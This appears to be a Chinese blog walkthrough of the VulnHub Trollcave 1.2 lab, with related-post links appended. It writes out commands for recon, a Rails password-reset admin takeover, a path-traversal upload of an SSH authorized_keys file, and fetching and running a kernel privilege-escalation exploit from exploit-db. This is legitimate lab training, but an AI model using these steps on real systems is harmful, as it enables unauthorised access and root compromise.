vulnhub靶机 trollcave-v1-2
下载靶机
地址:Trollcave: 1.2 ~ VulnHub
问题阐述
使用virtualbox,kali和靶机均使用桥接网络
kali:172.20.10.10 靶机:172.20.10.11
打靶目标
root用户的flag.txt
打靶过程
信息搜集
1.nmap扫描存活主机,并对存活主机做端口扫描
nmap -v -sP 172.20.10.1/24 //主机存活扫描
nmap -sV -sC -p- 192.168.0.149 -oA trollcave-allports//参数分析-sV 扫描服务和版本信息-sC 使用ping探测方式- oA 结果保存到的位置
2.发现80端口,使用dirsearch做目录扫描
dirsearch -u "http://172.20.10.11/"
3.访问网站做信息搜集 http://172.20.10.11/login
漏洞利用
4.编写脚本遍历用户信息,king为超级管理员
5,且信息搜集发现网站的程序是 rails,寻找漏洞,并进行漏洞利用。
确定源码 https://github.com/rails/rails
安装的时候会创建用户 rails ,从文章得 网站有一个重置密码的功能 但是没有链接提交。(https://oomake.com/question/2399179)
5.1进行密码重置
访问此链接, http://172.20.10.11/password_resets/new.html ,进行密码重置
重置时发现king用户无法重置,选择重置xer,出现一个连接
访问此连接进行密码重置
5.2修改 king 密码
此时权限就大了很多
使用King权限,开启文件上传和用户注册功能
上传 php木马,但是网站不解释 php 文件,但是发现上传的文件可以上传到其他目录。因此可以试试 rails 用户是否存在 ,如果存在可以上传 authorized_keys 到 rails 用户下的.ssh 就可以免密码登录 ssh
6.生成ssh密钥
ssh-keygen -f railsmv rails.pub authorized_key
将他上传到/home/rails/.ssh/
上传时要利用../../../../../
跳转到根目录,故上传路径为../../../../../../../home/rails/.ssh/authorized_keys
然后进行ssh登录
mv rails id_rsa-railschmod 600 id_rsa-railsssh -i id_rsa-rails rails@172.20.10.11
权限提升
获取权限后查看系统信息
uname -a
cat /etc/lsb-release
找到一个cve-2017-16995 提权 (https://www.exploit-db.com/exploits/45010)
靶机上没有gcc,本地编译, 在kali上使用searchsploit找exp
searchsploit 4.4.0-116
cp /usr/share/exploitdb/exploits/linux/local/44298.c ./
gcc 44298.c
本地开启一个http服务,靶机下载cve,开启交互式shell
python3 -m http.server 9999 //kali上开启http服务
wget http://172.20.10.10:9999/exp
python3 -c 'import pty; pty.spawn("/bin/bash")' //开启交互式shell
给exp添加可执行权限
chmod +x exp
最后执行exp,获取flag.txt
vulnhub靶机 trollcave-v1-2相关推荐
- [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...
- Vulnhub靶机系列:SecTalks: BNE0x03 - Simple
这次的靶机是vulnhub靶机:SecTalks: BNE0x03 - Simple 文章目录 靶机地址及相关描述 靶机地址 靶机描述 Simple CTF Location Hints 靶机设置 利 ...
- 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...
- [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...
- Vulnhub靶机DC系列-DC-8
Vulnhub靶机DC系列-DC-8 靶场名称:DC-8 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ 下载地址: DC-8.zip (Size: 379 ...
- Vulnhub靶机:EVILBOX_ ONE(很详细)
目录 介绍 信息收集 主机发现 主机信息探测 网站探测 目录扫描 目录扫描字典 爆破页面参数 Burpsuite爆破参数 ffuf 补充:区分文件包含与文件读取 文件包含漏洞 文件包含.任意文件读取的 ...
- Vulnhub靶机渗透学习——DC-9
本文仅个人学习所做笔记,仅供参考,有不足之处请指出! vulnhub靶机 vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试.提权. ...
- Vulnhub靶机Wakanda渗透测试攻略
前言 Wakanda是一个新的交易市场网站,很快会上线了.你的目标是通过黑客技术找到"振金"的确切位置. 页首配图 本vulnhub靶机环境由xMagass开发,并托管于Vulnh ...
- VMware检测不到vulnhub靶机IP地址解决办法
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 vulnhub靶机检测不到IP地址解决办法 原因一:查看网络适配器是否为NAT模式 原因二:虚拟网络编辑器配置出错 原因三:靶机网卡配 ...
- VulnHub靶机-Jangow: 1.0.1
NO.1 VulnHub靶机-Jangow: 1.0.1 迟到的文章,就当库存发出来吧~ by AnQtroops 2022.9.10 0x00 靶机信息 1.下载地址:https://www.vul ...
最新文章
- html显示数据库表格asp,ASP实现在WEB中显示电子表格数据 显示数据及生成HTML表格...
- 通过微信企业号发送zabbix报警
- 每日一句English
- JavaScript进阶1-学习笔记
- 手工编程是指利用计算机完成,西安交通大学17年3月课程考试《CAD CAM》作业考核试题...
- echo怎么把日志清空_shell脚本清空系统message日志
- mysql优化插入速度的方法_优化MySQL插入方法的五个妙招
- javax.validation.UnexpectedTypeException: HV000030: No validator could be found for constraint
- 自适应高度表格_React实现自适应高度的lt;textareagt;
- 无心剑中译奥修《顺其自然》
- hbase 特性与api
- vue中的v-show与v-if区别
- python在线朗读-使用python编写一个语音朗读闹钟功能的示例代码
- 创建私服maven服务
- 一个多文件编程里.h文件定义static变量产生的问题
- avedev matlab,avedev(avedev是什么函数)
- maven配置项目根路径_Java的项目构建工具Maven的配置和使用教程
- VS中Windows界面开发
- 自助任务平台WQ5.5.6源码对接微信带分类信息线报赏金赚悬赏猫驴赚网版本
- LintCode炼码刷题实操平台